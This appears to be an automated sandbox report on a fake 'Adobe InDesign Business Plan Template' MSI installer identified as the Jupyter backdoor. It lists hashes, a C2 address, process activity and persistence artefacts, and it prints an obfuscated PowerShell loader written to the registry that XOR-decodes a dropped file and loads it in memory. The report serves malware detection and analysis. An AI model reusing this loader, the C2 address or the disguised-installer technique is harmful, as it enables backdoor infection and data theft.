Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
02-10-2021 16:02
Static task
static1
Behavioral task
behavioral1
Sample
Adobe-Indesign-Business-Plan-Template-Free.msi
Resource
win7v20210408
windows7_x64
0 signatures
0 seconds
General
-
Target
Adobe-Indesign-Business-Plan-Template-Free.msi
-
Size
108.5MB
-
MD5
82dbf0d2b49de42dc700df7c96b41eb1
-
SHA1
509c08fd9805cf2034fec547c0fc962423a96a3b
-
SHA256
7ada6e666c34aacaf7c93d11ca2e563ec53da37fb23a181631809d0d5ef14387
-
SHA512
3d256fba291eb2f4a81ef53d8db8a333f3fb26a9a2c90e3c28bb0a944dc8bba2a2c8902232b14e6a9debdf93a2ff100faabb2be2053aac7fc2ccbdbd2f98fc83
Malware Config
Extracted
Family
jupyter
Version
SP-18
C2
http://188.241.83.61
Signatures
-
Jupyter Backdoor/Client Payload 1 IoCs
resource yara_rule behavioral1/memory/1944-125-0x0000000006410000-0x000000000641B000-memory.dmp family_jupyter -
Blocklisted process makes network request 3 IoCs
flow pid Process 2 1840 msiexec.exe 4 1840 msiexec.exe 9 1944 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1436 MSI8937.tmp 472 MSI8937.tmp -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\MicroSOft\winDOWs\sTARt mENu\ProgRAMs\sTArtup\a96fb6f8b754c29c11d545ae7280e.Lnk powershell.exe -
Loads dropped DLL 12 IoCs
pid Process 1376 MsiExec.exe 1436 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp 472 MSI8937.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy powershell.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\azoklbsdopsdwy\shell\open\command\ = "POWerShELl -wiNdowstylE HiDdeN -Ep byPAsS -COmMANd \"$a430d21fc7e4e5a384e68ec12d657='XjB8PD1eMFMoeV5ucnQqXjA8WUJAd3VnOz80TyRScyt4JU5tNyRzT3JpNz5TeU5SUm5qR2x6P3QpUXs8ayo5KDFueXNfKG4yKE99cXFuQ0B3dkxOQH05ZShAfSNBbEBVXnZ+QHxCTDZAdE1FMkB7KWp6Xk41QTFAfkVBckBzWWYjQFJOellAViRoJV5SSzEzQHs1SWxAclMqKkBVKlhtQHM1TyVAUllFb0BVZllNXlIxdGJAfjQtS0BxeGFpQFQjcSNeUiV0NEBgSW5mXk99YUFAfHYlWEBzeSNjXm5rZ20=';$aac234a2d4c4f3b635d4a3f5d61f8=[SyStem.Io.fILe]::reAdAllByTEs('C:\\Users\\Admin\\AppData\\Roaming\\micROSoft\\XlntuRpqvyOUsFIe\\qBxYPsdlOM.KezFwNmOtpHuXQsicPB');foR($a5722f7abb246584cc4eb2637a436=0;$a5722f7abb246584cc4eb2637a436 -LT $aac234a2d4c4f3b635d4a3f5d61f8.couNT;){fOR($a227219ce164ea81bcf7b1c4a47ef=0;$a227219ce164ea81bcf7b1c4a47ef -Lt $a430d21fc7e4e5a384e68ec12d657.lenGTH;$a227219ce164ea81bcf7b1c4a47ef++){$aac234a2d4c4f3b635d4a3f5d61f8[$a5722f7abb246584cc4eb2637a436]=$aac234a2d4c4f3b635d4a3f5d61f8[$a5722f7abb246584cc4eb2637a436] -BxOr $a430d21fc7e4e5a384e68ec12d657[$a227219ce164ea81bcf7b1c4a47ef];$a5722f7abb246584cc4eb2637a436++;IF($a5722f7abb246584cc4eb2637a436 -GE $aac234a2d4c4f3b635d4a3f5d61f8.COUNt){$a227219ce164ea81bcf7b1c4a47ef=$a430d21fc7e4e5a384e68ec12d657.LENgTH}}};[sYSTem.rEFLectIOn.assEmBLY]::lOaD($aac234a2d4c4f3b635d4a3f5d61f8);[ab821408b424418fa94bb4d815b4e.ad0682a943e4859ef35309cc0a537]::a1f5abfa214411baa77e25f6ceaa6()\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\.lqpevyfcou powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\.lqpevyfcou\ = "azoklbsdopsdwy" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe 1944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1840 msiexec.exe Token: SeIncreaseQuotaPrivilege 1840 msiexec.exe Token: SeRestorePrivilege 1260 msiexec.exe Token: SeTakeOwnershipPrivilege 1260 msiexec.exe Token: SeSecurityPrivilege 1260 msiexec.exe Token: SeCreateTokenPrivilege 1840 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1840 msiexec.exe Token: SeLockMemoryPrivilege 1840 msiexec.exe Token: SeIncreaseQuotaPrivilege 1840 msiexec.exe Token: SeMachineAccountPrivilege 1840 msiexec.exe Token: SeTcbPrivilege 1840 msiexec.exe Token: SeSecurityPrivilege 1840 msiexec.exe Token: SeTakeOwnershipPrivilege 1840 msiexec.exe Token: SeLoadDriverPrivilege 1840 msiexec.exe Token: SeSystemProfilePrivilege 1840 msiexec.exe Token: SeSystemtimePrivilege 1840 msiexec.exe Token: SeProfSingleProcessPrivilege 1840 msiexec.exe Token: SeIncBasePriorityPrivilege 1840 msiexec.exe Token: SeCreatePagefilePrivilege 1840 msiexec.exe Token: SeCreatePermanentPrivilege 1840 msiexec.exe Token: SeBackupPrivilege 1840 msiexec.exe Token: SeRestorePrivilege 1840 msiexec.exe Token: SeShutdownPrivilege 1840 msiexec.exe Token: SeDebugPrivilege 1840 msiexec.exe Token: SeAuditPrivilege 1840 msiexec.exe Token: SeSystemEnvironmentPrivilege 1840 msiexec.exe Token: SeChangeNotifyPrivilege 1840 msiexec.exe Token: SeRemoteShutdownPrivilege 1840 msiexec.exe Token: SeUndockPrivilege 1840 msiexec.exe Token: SeSyncAgentPrivilege 1840 msiexec.exe Token: SeEnableDelegationPrivilege 1840 msiexec.exe Token: SeManageVolumePrivilege 1840 msiexec.exe Token: SeImpersonatePrivilege 1840 msiexec.exe Token: SeCreateGlobalPrivilege 1840 msiexec.exe Token: SeCreateTokenPrivilege 1840 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1840 msiexec.exe Token: SeLockMemoryPrivilege 1840 msiexec.exe Token: SeIncreaseQuotaPrivilege 1840 msiexec.exe Token: SeMachineAccountPrivilege 1840 msiexec.exe Token: SeTcbPrivilege 1840 msiexec.exe Token: SeSecurityPrivilege 1840 msiexec.exe Token: SeTakeOwnershipPrivilege 1840 msiexec.exe Token: SeLoadDriverPrivilege 1840 msiexec.exe Token: SeSystemProfilePrivilege 1840 msiexec.exe Token: SeSystemtimePrivilege 1840 msiexec.exe Token: SeProfSingleProcessPrivilege 1840 msiexec.exe Token: SeIncBasePriorityPrivilege 1840 msiexec.exe Token: SeCreatePagefilePrivilege 1840 msiexec.exe Token: SeCreatePermanentPrivilege 1840 msiexec.exe Token: SeBackupPrivilege 1840 msiexec.exe Token: SeRestorePrivilege 1840 msiexec.exe Token: SeShutdownPrivilege 1840 msiexec.exe Token: SeDebugPrivilege 1840 msiexec.exe Token: SeAuditPrivilege 1840 msiexec.exe Token: SeSystemEnvironmentPrivilege 1840 msiexec.exe Token: SeChangeNotifyPrivilege 1840 msiexec.exe Token: SeRemoteShutdownPrivilege 1840 msiexec.exe Token: SeUndockPrivilege 1840 msiexec.exe Token: SeSyncAgentPrivilege 1840 msiexec.exe Token: SeEnableDelegationPrivilege 1840 msiexec.exe Token: SeManageVolumePrivilege 1840 msiexec.exe Token: SeImpersonatePrivilege 1840 msiexec.exe Token: SeCreateGlobalPrivilege 1840 msiexec.exe Token: SeCreateTokenPrivilege 1840 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1840 msiexec.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1260 wrote to memory of 1376 1260 msiexec.exe 26 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1840 wrote to memory of 1436 1840 msiexec.exe 27 PID 1376 wrote to memory of 1944 1376 MsiExec.exe 28 PID 1376 wrote to memory of 1944 1376 MsiExec.exe 28 PID 1376 wrote to memory of 1944 1376 MsiExec.exe 28 PID 1376 wrote to memory of 1944 1376 MsiExec.exe 28 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30 PID 1436 wrote to memory of 472 1436 MSI8937.tmp 30
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Adobe-Indesign-Business-Plan-Template-Free.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\MSI8937.tmp"C:\Users\Admin\AppData\Local\Temp\MSI8937.tmp"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\Temp\{546D6E0B-7BE4-4839-901B-65B90D9BCC36}\.cr\MSI8937.tmp"C:\Windows\Temp\{546D6E0B-7BE4-4839-901B-65B90D9BCC36}\.cr\MSI8937.tmp" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\MSI8937.tmp" -burn.filehandle.attached=180 -burn.filehandle.self=1883⤵
- Executes dropped EXE
- Loads dropped DLL
PID:472
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D0B6FCDC0E17D0F8916305DF87B54653 C2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8E6C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8E3A.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8E3B.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8E3C.txt" -propSep " :<->: " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Drops startup file
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1944
-
-